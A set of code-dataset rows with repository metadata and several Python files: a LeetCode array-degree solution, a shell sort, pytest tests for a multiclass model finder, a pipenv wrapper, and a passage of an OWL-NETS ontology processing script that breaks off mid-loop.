hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a4d16b4c3d74ca8d527ddca0d0151b53656d5161 | 1,364 | py | Python | python/problems/degree_of_an_array.py | vivaxy/algorithms | b2e49476ed2ad1fd82a1183f656d1907a666c347 | [
"MIT"
] | 1 | 2019-05-04T13:21:41.000Z | 2019-05-04T13:21:41.000Z | python/problems/degree_of_an_array.py | vivaxy/algorithms | b2e49476ed2ad1fd82a1183f656d1907a666c347 | [
"MIT"
] | 1 | 2021-08-30T09:34:58.000Z | 2021-08-30T09:34:58.000Z | python/problems/degree_of_an_array.py | vivaxy/algorithms | b2e49476ed2ad1fd82a1183f656d1907a666c347 | [
"MIT"
] | null | null | null | """
https://leetcode.com/problems/degree-of-an-array/
https://leetcode.com/submissions/detail/130966108/
"""
class Solution:
def findShortestSubArray(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
d = dict()
for index, num in enumerate(nums):
if num in d:
d[num]['end'] = index
d[num]['count'] += 1
else:
d[num] = {
'count': 1,
'start': index,
'end': index,
}
maxCount = 0
minLenght = len(nums)
for value in d:
count = d[value]['count']
if count > maxCount:
maxCount = count
minLenght = d[value]['end'] - d[value]['start'] + 1
elif count == maxCount:
currentLength = d[value]['end'] - d[value]['start'] + 1
if minLenght > currentLength:
minLenght = currentLength
return minLenght
import unittest
class Test(unittest.TestCase):
def test(self):
solution = Solution()
self.assertEqual(solution.findShortestSubArray([1, 2, 2, 3, 1]), 2)
self.assertEqual(solution.findShortestSubArray(
[1, 2, 2, 3, 1, 4, 2]), 6)
if __name__ == '__main__':
unittest.main()
| 26.230769 | 75 | 0.483138 | 1,181 | 0.865836 | 0 | 0 | 0 | 0 | 0 | 0 | 246 | 0.180352 |
a4d22d1bd565732da4c1ec7b24284eccde734139 | 318 | py | Python | algorithms/shellSort.py | maxotar/algorithms | d8b112ffa0c6de78de0b84599d1de8aebf37dad4 | [
"MIT"
] | null | null | null | algorithms/shellSort.py | maxotar/algorithms | d8b112ffa0c6de78de0b84599d1de8aebf37dad4 | [
"MIT"
] | null | null | null | algorithms/shellSort.py | maxotar/algorithms | d8b112ffa0c6de78de0b84599d1de8aebf37dad4 | [
"MIT"
] | null | null | null | def shellSort(alist):
gap = len(alist) // 2
while gap > 0:
for i in range(gap, len(alist)):
val = alist[i]
j = i
while j >= gap and alist[j - gap] > val:
alist[j] = alist[j - gap]
j -= gap
alist[j] = val
gap //= 2
| 26.5 | 52 | 0.399371 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
a4d2bfb9bbe71f1897475772fae314ec357bb5a9 | 13,245 | py | Python | tests/test_model_finder_multiclass.py | maciek3000/data_dashboard | 1b573b674d37f57ae7e8bbfb1e83c801b488dfd6 | [
"MIT"
] | 8 | 2021-05-03T04:06:15.000Z | 2022-01-15T16:27:42.000Z | tests/test_model_finder_multiclass.py | maciek3000/data_dashboard | 1b573b674d37f57ae7e8bbfb1e83c801b488dfd6 | [
"MIT"
] | null | null | null | tests/test_model_finder_multiclass.py | maciek3000/data_dashboard | 1b573b674d37f57ae7e8bbfb1e83c801b488dfd6 | [
"MIT"
] | 3 | 2021-05-19T17:31:18.000Z | 2021-06-19T12:24:01.000Z | import pytest
import numpy as np
import pandas as pd
from sklearn.linear_model import LogisticRegression, RidgeClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.svm import SVC
from sklearn.metrics import accuracy_score
from sklearn.dummy import DummyClassifier
@pytest.mark.parametrize(
("test_input",),
(
([0, 1, 2, 3, 4, 5],),
([6, 7, 8, 9, 10, 11],),
([12, 13, 14, 15, 16, 17],),
)
)
def test_model_finder_dummy_multiclass(
model_finder_multiclass, split_dataset_multiclass, seed, multiclass_scorings, test_input
):
"""Testing if DummyModel (for multiclass) is created correctly."""
X_train = split_dataset_multiclass[0]
y_train = split_dataset_multiclass[2]
expected_model = DummyClassifier(strategy="stratified", random_state=seed)
expected_model.fit(X_train, y_train)
expected_model_scores = {"f1_score_weighted": 0.4772161172161172, "precision_score_weighted": 0.508}
model_finder_multiclass.scoring_functions = multiclass_scorings
model_finder_multiclass.default_scoring = multiclass_scorings[0]
actual_model, actual_model_scores = model_finder_multiclass._create_dummy_model()
print(expected_model.predict(test_input))
assert str(actual_model) == str(expected_model)
assert np.array_equal(actual_model.predict(test_input), expected_model.predict(test_input))
assert actual_model_scores == expected_model_scores
def test_model_finder_multiclass_dummy_model_results(model_finder_multiclass, seed):
"""Testing if dummy_model_results() function returns correct DataFrame (multiclass)."""
_ = {
"model": "DummyClassifier",
"fit_time": np.nan,
"params": "{{'constant': None, 'random_state': {seed}, 'strategy': 'stratified'}}".format(seed=seed),
"f1_score_micro": 0.48,
"f1_score_weighted": 0.4772161172161172,
"precision_score_weighted": 0.508,
"recall_score_weighted": 0.48,
"accuracy_score": 0.48,
"balanced_accuracy_score": 0.4987373737373737
}
expected_df = pd.DataFrame(_, index=[9999])
actual_df = model_finder_multiclass._dummy_model_results()
assert actual_df.equals(expected_df[actual_df.columns])
@pytest.mark.parametrize(
("mode", "expected_model"),
(
("quick", DecisionTreeClassifier(max_depth=10)),
("detailed", LogisticRegression(tol=0.1))
)
)
def test_model_finder_multiclass_search(model_finder_multiclass, multiclass_scorings, mode, expected_model, seed):
"""Testing if search() function returns expected Model (for multiclass)."""
model_finder_multiclass._quicksearch_limit = 1
actual_model = model_finder_multiclass.search(models=None, scoring=multiclass_scorings[0], mode=mode)
expected_model.random_state = seed
assert str(actual_model) == str(expected_model)
@pytest.mark.parametrize(
("models", "expected_model"),
(
([
RidgeClassifier(alpha=1.0, random_state=1),
RidgeClassifier(alpha=100.0, random_state=1)
],
RidgeClassifier(alpha=1.0, random_state=1)),
([
SVC(C=1.0, random_state=10),
SVC(C=10.0, random_state=14),
SVC(C=100.0, random_state=35)
],
SVC(C=10.0, random_state=14))
)
)
def test_model_finder_multiclass_search_defined_models(
model_finder_multiclass, multiclass_scorings, models, expected_model
):
"""Testing if models provided explicitly are being scored and chosen properly in multiclass
(including models not present in default models collection)."""
actual_model = model_finder_multiclass.search(models=models, scoring=multiclass_scorings[0])
assert str(actual_model) == str(expected_model)
def test_model_finder_perform_gridsearch_multiclass(
model_finder_multiclass, multiclass_scorings, chosen_classifiers_grid, seed
):
"""Testing if gridsearch works and returns correct Models and result dict (in multiclass)."""
expected_models = [
(DecisionTreeClassifier, {"max_depth": 10, "criterion": "gini", "random_state": seed}),
(LogisticRegression, {"C": 1.0, "tol": 0.1, "random_state": seed}),
(SVC, {"C": 1.0, "tol": 0.1, "random_state": seed})
]
standard_keys = [
"iter", "n_resources", "mean_fit_time", "std_fit_time", "mean_score_time", "std_score_time", "params",
"split0_train_score", "split1_train_score", "split2_train_score", "split3_train_score", "split4_train_score",
"split0_test_score", "split1_test_score", "split2_test_score", "split3_test_score", "split4_test_score",
"rank_test_score", "mean_test_score", "mean_train_score", "std_test_score", "std_train_score"
]
actual_models, actual_results = model_finder_multiclass._perform_gridsearch(
chosen_classifiers_grid, multiclass_scorings[0], cv=5
)
assert sorted(actual_models, key=lambda x: x[0].__name__) == expected_models
# checking if the keys in dicts from actual_results match what is expected
assert len(actual_results.keys()) == len(expected_models)
for model_tuple in expected_models:
ml = model_tuple[0]
params = model_tuple[1]
ml_specific_keys = ["param_" + param for param in params.keys()] + standard_keys
expected_keys = set(ml_specific_keys)
actual_keys = set(actual_results[ml].keys())
assert actual_keys == expected_keys
def test_model_finder_perform_quicksearch_multiclass(
model_finder_multiclass, multiclass_scorings, chosen_classifiers_grid, seed
):
"""Testing if quicksearch works and returns correct Models and result dict (in multiclass)."""
expected_models = [
(DecisionTreeClassifier, 0.948507632718159),
(LogisticRegression, 0.8982456140350877),
(SVC, 0.6207827260458838),
]
expected_keys = {"fit_time", "f1_score_weighted", "params"}
actual_models, actual_results = model_finder_multiclass._perform_quicksearch(
chosen_classifiers_grid, multiclass_scorings[0]
)
assert sorted(actual_models, key=lambda x: x[0].__name__) == expected_models
# checking if the keys in dicts from actual_results match what is expected
assert len(actual_results.keys()) == len(expected_models)
for model_tuple in expected_models:
model = model_tuple[0]
actual_keys = set(actual_results[model].keys())
assert actual_keys == expected_keys
@pytest.mark.parametrize(
("limit", "expected_models"),
(
(1, [DecisionTreeClassifier]),
(2, [DecisionTreeClassifier, LogisticRegression])
)
)
def test_model_finder_quicksearch_multiclass(
model_finder_multiclass, chosen_classifiers_grid, multiclass_scorings, limit, expected_models
):
"""Testing if quicksearch correctly chooses only a limited number of found Models based on the limit
(in multiclass)."""
model_finder_multiclass._quicksearch_limit = limit
actual_models = model_finder_multiclass._quicksearch(chosen_classifiers_grid, multiclass_scorings[0])
assert actual_models == expected_models
def test_model_finder_assess_models_multiclass(model_finder_multiclass, multiclass_scorings, seed):
"""Testing if assess_model function returns correct Models and result dict (in multiclass)."""
models = [
DecisionTreeClassifier(**{"max_depth": 10, "criterion": "entropy", "random_state": seed}),
LogisticRegression(**{"C": 1.0, "tol": 0.1, "random_state": seed}),
SVC(**{"C": 0.1, "tol": 0.1, "random_state": seed})
]
scores = [1.0, 1.0, 0.26888888888888896]
expected_models = list(zip(models, scores))
expected_keys = {"fit_time", "f1_score_weighted", "params", "precision_score_weighted"}
actual_models, actual_results = model_finder_multiclass._assess_models_performance(models, multiclass_scorings[0])
assert actual_models == expected_models
assert len(actual_results.keys()) == len(expected_models)
for model in actual_results:
assert set(actual_results[model].keys()) == set(expected_keys) # testing keys from act and exp dicts
@pytest.mark.parametrize(
("limit",),
(
(1,),
(2,),
)
)
def test_model_finder_multiclass_search_results_dataframe(model_finder_multiclass_fitted, limit, seed):
"""Testing if search_results_dataframe is being correctly filtered out to a provided
model_limit (in multiclass)"""
models = ["DecisionTreeClassifier", "LogisticRegression", "SVC"]
dummy = ["DummyClassifier"]
expected_index = models[:limit] + dummy
expected_keys = {"fit_time", "params", "f1_score_weighted", "f1_score_micro", "precision_score_weighted",
"accuracy_score", "recall_score_weighted", "balanced_accuracy_score"}
actual_results = model_finder_multiclass_fitted.search_results(limit)
assert actual_results.index.tolist() == expected_index
assert set(actual_results.columns) == expected_keys
@pytest.mark.parametrize(
("input_func", "expected_results"),
(
((
lambda y_true, y_score, param_one, param_two: y_true + y_score + param_one + param_two,
{"param_one": 10, "param_two": 20}, "test_func1"
), [33, 4, 5]),
(
(lambda y_true, y_score, param_multiply: (y_true + y_score) * param_multiply,
{"param_multiply": 100}, "test_func2"),
[300, 4, 5]
)
)
)
def test_model_finder_multiclass_create_scoring_multiclass(
model_finder_multiclass, input_func, expected_results
):
"""Testing if creating closures (and adding them to regular scorings) for multiclass scorings works correctly."""
y_actual = 1
y_predicted = 2
def plus_one(y_true, y_score):
return y_true + y_score + 1
def plus_two(y_true, y_score):
return y_true + y_score + 2
model_finder_multiclass._scoring_multiclass = [plus_one, plus_two]
model_finder_multiclass._scoring_multiclass_parametrized = [input_func]
scorings = model_finder_multiclass._create_scoring_multiclass()
actual_results = []
for sc in scorings:
actual_results.append(sc(y_actual, y_predicted))
assert actual_results == expected_results
@pytest.mark.parametrize(
("limit",),
(
(1,),
(2,),
(3,),
)
)
def test_model_finder_multiclass_confusion_matrices(model_finder_multiclass_fitted, limit):
"""Testing if confusion matrices are being correctly calculated and returned (in multiclass)."""
results = [
("DecisionTreeClassifier", [11, 0, 0, 0, 6, 0, 0, 0, 8]),
("LogisticRegression", [11, 0, 0, 0, 6, 0, 0, 0, 8]),
("SVC", [11, 0, 0, 0, 6, 0, 3, 0, 5])
]
expected_results = results[:limit]
actual_results = model_finder_multiclass_fitted.confusion_matrices(limit)
for actual_result, expected_result in zip(actual_results, expected_results):
assert actual_result[0].__class__.__name__ == expected_result[0]
assert actual_result[1].shape == (3, 3)
assert actual_result[1].ravel().tolist() == expected_result[1]
@pytest.mark.parametrize(
("limit",),
(
(1,),
(2,),
(3,),
)
)
def test_model_finder_predict_X_test_multiclass(model_finder_multiclass_fitted, split_dataset_multiclass, limit, seed):
"""Testing if predictions of X_test split from found models are correct (in multiclass)."""
models = [
DecisionTreeClassifier(**{"max_depth": 10, "random_state": seed}),
LogisticRegression(**{"C": 1.0, "tol": 0.1, "random_state": seed}),
SVC(**{"tol": 0.1, "random_state": seed})
]
results = []
X_train, X_test, y_train, y_test = split_dataset_multiclass
for model in models:
new_model = model.fit(X_train, y_train)
results.append((model, new_model.predict(X_test)))
expected_results = results[:limit]
actual_results = model_finder_multiclass_fitted.predictions_X_test(limit)
for actual_result, expected_result in zip(actual_results, expected_results):
assert str(actual_result[0]) == str(expected_result[0])
assert np.array_equal(actual_result[1], expected_result[1])
@pytest.mark.parametrize(
("model",),
(
(LogisticRegression(),),
(SVC(C=1000.0),),
(DecisionTreeClassifier(max_depth=10, criterion="entropy"),)
)
)
def test_model_finder_calculate_model_score_multiclass_regular_scoring(
model_finder_multiclass, split_dataset_multiclass, model
):
"""Testing if calculating model score works correctly in multiclass with scoring != roc_auc_score."""
scoring = accuracy_score
X_train = split_dataset_multiclass[0]
X_test = split_dataset_multiclass[1]
y_train = split_dataset_multiclass[2]
y_test = split_dataset_multiclass[3]
model.fit(X_train, y_train)
expected_result = scoring(y_test, model.predict(X_test))
actual_result = model_finder_multiclass._calculate_model_score(model, X_test, y_test, scoring)
assert actual_result == expected_result
| 39.655689 | 119 | 0.693016 | 0 | 0 | 0 | 0 | 8,438 | 0.637071 | 0 | 0 | 2,997 | 0.226274 |
a4d2c519e52801c5f72a8807dcf068695b6c4b84 | 2,249 | py | Python | possum/utils/pipenv_.py | brysontyrrell/Possum | 0ae7c90d7890f16d8405e346b0778bf878e29d5f | [
"MIT"
] | 24 | 2018-03-14T15:25:52.000Z | 2019-03-13T18:36:46.000Z | possum/utils/pipenv_.py | brysontyrrell/Possum | 0ae7c90d7890f16d8405e346b0778bf878e29d5f | [
"MIT"
] | 20 | 2018-04-11T04:36:40.000Z | 2019-01-17T11:44:30.000Z | possum/utils/pipenv_.py | brysontyrrell/Possum | 0ae7c90d7890f16d8405e346b0778bf878e29d5f | [
"MIT"
] | 5 | 2018-01-04T21:10:15.000Z | 2019-01-16T20:10:12.000Z | import os
import shutil
import subprocess
from possum.exc import PipenvPathNotFound
class PipenvWrapper:
def __init__(self):
self.pipenv_path = shutil.which('pipenv')
if not self.pipenv_path:
raise PipenvPathNotFound
# Force pipenv to ignore any currently active pipenv environment
os.environ['PIPENV_IGNORE_VIRTUALENVS'] = '1'
@property
def venv_path(self):
return self.get_virtual_environment_path()
def create_virtual_environment(self):
p = subprocess.Popen(
[self.pipenv_path, '--three'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE
)
p.communicate()
def get_virtual_environment_path(self):
p = subprocess.Popen(
[self.pipenv_path, '--venv'],
stdout=subprocess.PIPE
)
result = p.communicate()
return result[0].decode('ascii').strip('\n')
def get_site_packages(self):
return subprocess.check_output(
[
'pipenv', 'run', 'python', '-c',
'from distutils.sysconfig import get_python_lib; '
'print(get_python_lib())'
],
universal_newlines=True
).strip()
def install_packages(self):
p = subprocess.Popen(
[self.pipenv_path, 'install'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL
)
p.communicate()
def remove_virtualenv(self):
p = subprocess.Popen(
[self.pipenv_path, '--rm'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL
)
p.communicate()
def check_package_title(self, package):
try:
# Yes, this needs to be better, but performing this one-liner
# though the Pipenv environment of the project only seems to work
# when 'shell=True' is set.
return subprocess.check_output(
f'{self.pipenv_path} run python -c "import '
f'{package}; print({package}.__title__)"',
shell=True, universal_newlines=True
).strip()
except subprocess.CalledProcessError:
return package
| 29.592105 | 77 | 0.581147 | 2,161 | 0.960871 | 0 | 0 | 85 | 0.037795 | 0 | 0 | 483 | 0.214762 |
a4d3c18e507f51dc482e2dde54e9596a534b4b39 | 360 | py | Python | tests/test__init__.py | Combofoods/pyenv | 8b33173e593054b8d46a8c3be99c44f7294c7069 | [
"MIT"
] | 1 | 2020-07-22T12:19:26.000Z | 2020-07-22T12:19:26.000Z | tests/test__init__.py | Combofoods/pyenv | 8b33173e593054b8d46a8c3be99c44f7294c7069 | [
"MIT"
] | null | null | null | tests/test__init__.py | Combofoods/pyenv | 8b33173e593054b8d46a8c3be99c44f7294c7069 | [
"MIT"
] | null | null | null | import pytest
import envpy
import os
folder = os.path.dirname(__file__)
folder_env_file = f'{folder}/resources'
file_dot_env = 'test.env'
def test__init__():
karg = {'filepath':folder_env_file, 'filename':file_dot_env}
envpy.get_variables(**karg)
envpy.printenv(envpy.get_variables(**karg))
if __name__ == "__main__":
test__init__() | 18 | 64 | 0.713889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 61 | 0.169444 |
a4d467254a4a29717b7a458692ff809fe8f6fa14 | 195 | py | Python | randomAgent.py | FavOla/SIAUROP | 9d3f4ade1ab00a16dbc8ae9c1bd8c1f960d11aff | [
"MIT"
] | null | null | null | randomAgent.py | FavOla/SIAUROP | 9d3f4ade1ab00a16dbc8ae9c1bd8c1f960d11aff | [
"MIT"
] | null | null | null | randomAgent.py | FavOla/SIAUROP | 9d3f4ade1ab00a16dbc8ae9c1bd8c1f960d11aff | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@author: fnels
"""
import random
def random_actions():
action_list = [random.randint(0, 3)]
return action_list
| 16.25 | 44 | 0.558974 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 68 | 0.348718 |
a4d50e8466b5656c97fd8b070e30b4fcbd98845c | 18,320 | py | Python | scripts/owlnets_script/__main__pre_20210905.py | hubmapconsortium/ontology-api | f7fadf31de028acdd9cabbb5e9d6e48b9863ffac | [
"MIT"
] | 2 | 2021-10-03T15:31:55.000Z | 2021-10-04T08:55:23.000Z | scripts/owlnets_script/__main__pre_20210905.py | hubmapconsortium/ontology-api | f7fadf31de028acdd9cabbb5e9d6e48b9863ffac | [
"MIT"
] | 105 | 2020-12-11T13:03:31.000Z | 2022-03-31T17:08:03.000Z | scripts/owlnets_script/__main__pre_20210905.py | hubmapconsortium/ontology-api | f7fadf31de028acdd9cabbb5e9d6e48b9863ffac | [
"MIT"
] | 2 | 2021-07-08T14:49:25.000Z | 2022-02-14T20:12:20.000Z | #!/usr/bin/env python
import argparse
import os
import pkt_kg as pkt
import psutil
import re
from rdflib import Graph
from rdflib.namespace import OWL, RDF, RDFS
from tqdm import tqdm
import glob
import logging.config
import time
from datetime import timedelta
from lxml import etree
from urllib.request import urlopen
import subprocess
import hashlib
from typing import Dict
# Setup and running the script...
#
# $ cd scripts
# $ python3 -m venv venv
# $ source venv/bin/activate
# $ python --version
# Python 3.9.5
# $ pip install -r requirements.txt
# $ brew install wget
# $ ./owlnets_script/__main__.py owl_url
class RawTextArgumentDefaultsHelpFormatter(
argparse.ArgumentDefaultsHelpFormatter,
argparse.RawTextHelpFormatter
):
pass
# https://docs.python.org/3/howto/argparse.html
parser = argparse.ArgumentParser(
description='Run PheKnowLator on OWL file (required parameter).\n'
'Before running check to see if there are imports in the OWL file and exit if so'
'unless the --with_imports switch is also given.\n'
'\n'
'In general you should not have the change any of the optional arguments',
formatter_class=RawTextArgumentDefaultsHelpFormatter)
parser.add_argument('owl_url', type=str,
help='url for the OWL file to process.')
parser.add_argument("-l", "--owlnets_dir", type=str, default='./owlnets_output',
help='directory used for the owlnets output files')
parser.add_argument("-t", "--owltools_dir", type=str, default='./pkt_kg/libs',
help='directory where the owltools executable is downloaded to')
parser.add_argument("-o", "--owl_dir", type=str, default='./owl',
help='directory used for the owl input files')
parser.add_argument("-c", "--clean", action="store_true",
help='clean the owlnets_output directory of previous output files before run')
parser.add_argument("-d", "--force_owl_download", action="store_true",
help='force downloading of the .owl file before processing')
parser.add_argument("-w", "--with_imports", action="store_true",
help='process OWL file even if imports are found, otherwise give up with an error')
parser.add_argument("-r", "--robot", action="store_true",
help='apply robot to owl_url incorporating the includes and exit')
parser.add_argument("-v", "--verbose", action="store_true",
help='increase output verbosity')
args = parser.parse_args()
log_dir, log, log_config = 'builds/logs', 'pkt_build_log.log', glob.glob('**/logging.ini', recursive=True)
logger = logging.getLogger(__name__)
logging.config.fileConfig(log_config[0], disable_existing_loggers=False, defaults={'log_file': log_dir + '/' + log})
uri = args.owl_url
def file_from_uri(uri_str: str) -> str:
if uri_str.find('/'):
return uri_str.rsplit('/', 1)[1]
def file_from_path(path_str: str) -> str:
i = path_str.rfind(os.sep)
if i > 0 & i < len(path_str)-1:
return path_str[i+1:]
return None
def download_owltools(loc: str) -> None:
owl_tools_url = 'https://github.com/callahantiff/PheKnowLator/raw/master/pkt_kg/libs/owltools'
cmd = os.system(f"ls {loc}{os.sep}owltools")
if os.WEXITSTATUS(cmd) != 0:
logger.info('Download owltools and update permissions')
# move into pkt_kg/libs/ directory
cwd = os.getcwd()
os.system(f"mkdir -p {loc}")
os.chdir(loc)
os.system(f'wget {owl_tools_url}')
os.system('chmod +x owltools')
# move back to the working directory
os.chdir(cwd)
def download_owl(url: str, loc: str, force_empty=True) -> str:
logger.info(f'Downloading owl file from \'{url}\' to \'{loc}\'')
cwd: str = os.getcwd()
os.system(f"mkdir -p {loc}")
os.chdir(loc)
if force_empty is True:
os.system(f"rm -f *.owl *.md5")
# TODO: This hangs sometimes, so there should be a timeout...
wgetResults: bytes = subprocess.check_output([f'wget {url}'], shell=True, stderr=subprocess.STDOUT)
wgetResults_str: str = wgetResults.decode('utf-8')
for line in wgetResults_str.strip().split('\n'):
if 'Length: unspecified' in line:
logger.error(f'Failed to download {uri}')
print(f'Failed to download {uri}')
print(wgetResults_str)
exit(1)
if args.verbose:
print(wgetResults_str)
md5: str = hashlib.md5(open(working_file, 'rb').read()).hexdigest()
md5_file: str = f'{working_file}.md5'
logger.info('MD5 for owl file {md5} saved to {md5_file}')
with open(md5_file, 'w', newline='') as fp:
fp.write(md5)
os.chdir(cwd)
def compare_file_md5(working_file: str) -> bool:
if not os.path.isfile(working_file):
return False
md5_file: str = f'{working_file}.md5'
if not os.path.isfile(md5_file):
return False
with open(md5_file, 'r', newline='') as fp:
saved_md5 = fp.read()
md5: str = hashlib.md5(open(working_file, 'rb').read()).hexdigest()
if md5 == saved_md5:
return True
return False
# https://docs.python.org/3/library/xml.etree.elementtree.html#parsing-xml-with-namespaces
def scan_xml_tree_for_imports(tree: etree.ElementTree) -> list:
# These should be read from the source file via the 'xmlns' property....
owl_xmlns: str = 'http://www.w3.org/2002/07/owl#'
rdf_xmlns: str = 'http://www.w3.org/1999/02/22-rdf-syntax-ns#'
imports: list = tree.findall('owl:Ontology/owl:imports', namespaces={'owl': owl_xmlns})
resource_uris: list = []
for i in imports:
resource_uri: str = i.get(f"{{{rdf_xmlns}}}resource")
resource_uris.append(resource_uri)
return resource_uris
def search_owl_file_for_imports(owl_filename: str) -> None:
parser = etree.HTMLParser()
tree: etree.ElementTree = etree.parse(owl_filename, parser)
imports: list = scan_xml_tree_for_imports(tree)
if len(imports) != 0:
logger.info(f"Found the following imports were found in the OWL file {uri} : {', '.join(imports)}")
if args.with_imports is not True:
exit_msg = f"Imports found in OWL file {uri}. Exiting"
logger.info(exit_msg)
print(exit_msg)
exit(1)
else:
msg = f"No imports were found in OWL file {uri}"
logger.info(msg)
if args.verbose:
print(msg)
def log_files_and_sizes(dir: str) -> None:
for file in os.listdir(dir):
generated_file: str = os.path.join(dir, file)
size: int = os.path.getsize(generated_file)
logger.info(f"Generated file '{generated_file}' size {size:,}")
def robot_merge(owl_url: str) -> None:
logger.info(f"Running robot merge on '{uri}'")
loc = f'.{os.sep}robot'
robot_jar = 'https://github.com/ontodev/robot/releases/download/v1.8.1/robot.jar'
robot_sh = 'https://raw.githubusercontent.com/ontodev/robot/master/bin/robot'
if 'JAVA_HOME' not in os.environ:
print('The environment variable JAVA_HOME must be set and point to a valid JDK')
exit(1)
java_home: str = os.getenv('JAVA_HOME')
jdk: str = file_from_path(java_home)
if not re.match(r'^jdk-.*\.jdk$', jdk):
print(f'Environment variable JAVA_HOME={java_home} does not appear to point to a valid JDK?')
exit(1)
cwd = os.getcwd()
os.system(f"mkdir -p {loc}")
os.chdir(loc)
if not os.path.exists(file_from_uri(robot_jar)):
os.system(f"wget {robot_jar}")
robot: str = file_from_uri(robot_sh)
if not os.path.exists(robot):
os.system(f"wget {robot_sh}")
os.system(f"chmod +x {robot}")
owl_file: str = file_from_uri(owl_url)
if not os.path.exists(owl_file):
os.system(f"wget {owl_url}")
# https://robot.obolibrary.org/merge
os.system(f".{os.sep}robot merge --input .{os.sep}{owl_file} --output .{os.sep}{owl_file}.merge")
# move back to the working directory
os.chdir(cwd)
start_time = time.time()
print(f"Processing '{uri}'")
logger.info(f"Processing '{uri}'")
# This should remove imports if any. Currently it's a one shot deal and exits.
# TODO: In the future the output of this can be fed into the pipeline so that the processing contains no imports.
if args.robot is True:
robot_merge(uri)
elapsed_time = time.time() - start_time
logger.info('Done! Elapsed time %s', "{:0>8}".format(str(timedelta(seconds=elapsed_time))))
exit(0)
download_owltools(args.owltools_dir)
working_file: str = file_from_uri(uri)
uri_dir: str = working_file.rsplit('.', 1)[0]
working_dir: str = args.owlnets_dir + os.path.sep + uri_dir
logger.info("Make sure working directory '%s' exists", working_dir)
os.system(f"mkdir -p {working_dir}")
if args.clean is True:
logger.info(f"Deleting files in working directory {working_dir} because of --clean option")
os.system(f"cd {working_dir}; rm -f *")
working_dir_file_list = os.listdir(working_dir)
if len(working_dir_file_list) == 0:
logger.info(f"Working directory {working_dir} is empty")
else:
logger.error(f"Working directory {working_dir} is NOT empty")
# Code below taken from:
# https://github.com/callahantiff/PheKnowLator/blob/master/notebooks/OWLNETS_Example_Application.ipynb
cpus = psutil.cpu_count(logical=True)
logger.info('Loading ontology')
# Parse an XML document from a URL or an InputSource.
# NOTE: Sometimes, with large documents (eg., chebi) the uri parse hangs, so here we download the document first
# Another problem is with chebi, there is a redirect which Graph.parse(uri, ...) may not handle.
parse_loc: str = uri
owl_dir: str = args.owl_dir + os.path.sep + uri_dir
owl_file: str = owl_dir + os.path.sep + working_file
if compare_file_md5(owl_file) is False or args.force_owl_download is True:
download_owl(uri, owl_dir)
# At this point we have either downloaded the .owl file because the MD5 that we found for it was wrong,
# or we were told to force the download. If the MD5 is wrong at this point, we punt!
if compare_file_md5(owl_file) is False:
err_msg: str = f"MD5 for OWL file does not match?! Terminating."
logger.error(err_msg)
print(err_msg)
exit(1)
search_owl_file_for_imports(owl_file)
graph = Graph().parse(parse_loc, format='xml')
logger.info('Extract Node Metadata')
ont_classes = pkt.utils.gets_ontology_classes(graph)
ont_labels = {str(x[0]): str(x[2]) for x in list(graph.triples((None, RDFS.label, None)))}
ont_synonyms = pkt.utils.gets_ontology_class_synonyms(graph)
ont_dbxrefs = pkt.utils.gets_ontology_class_dbxrefs(graph)
ont_objects = pkt.utils.gets_object_properties(graph)
logger.info('Add the class metadata to the master metadata dictionary')
entity_metadata = {'nodes': {}, 'relations': {}}
for cls in tqdm(ont_classes):
# get class metadata - synonyms and dbxrefs
syns = '|'.join([k for k, v in ont_synonyms[0].items() if v == str(cls)])
dbxrefs = '|'.join([k for k, v in ont_dbxrefs[0].items() if v == str(cls)])
# extract metadata
if '_' in str(cls):
namespace = re.findall(r'^(.*?)(?=\W|_)', str(cls).split('/')[-1])[0].upper()
else:
namespace = str(cls).split('/')[2]
# update dict
entity_metadata['nodes'][str(cls)] = {
'label': ont_labels[str(cls)] if str(cls) in ont_labels.keys() else 'None',
'synonyms': syns if syns != '' else 'None',
'dbxrefs': dbxrefs if dbxrefs != '' else 'None',
'namespace': namespace
}
logger.info('Add the object metadata to the master metadata dictionary')
for obj in tqdm(ont_objects):
# get object label
label_hits = list(graph.objects(obj, RDFS.label))
label = str(label_hits[0]) if len(label_hits) > 0 else 'None'
# get object namespace
if 'obo' in str(obj) and len(str(obj).split('/')) > 5:
namespace = str(obj).split('/')[-2].upper()
else:
if '_' in str(obj):
namespace = re.findall(r'^(.*?)(?=\W|_)', str(obj).split('/')[-1])[0].upper()
else:
namespace = str(obj).split('/')[2]
# update dict
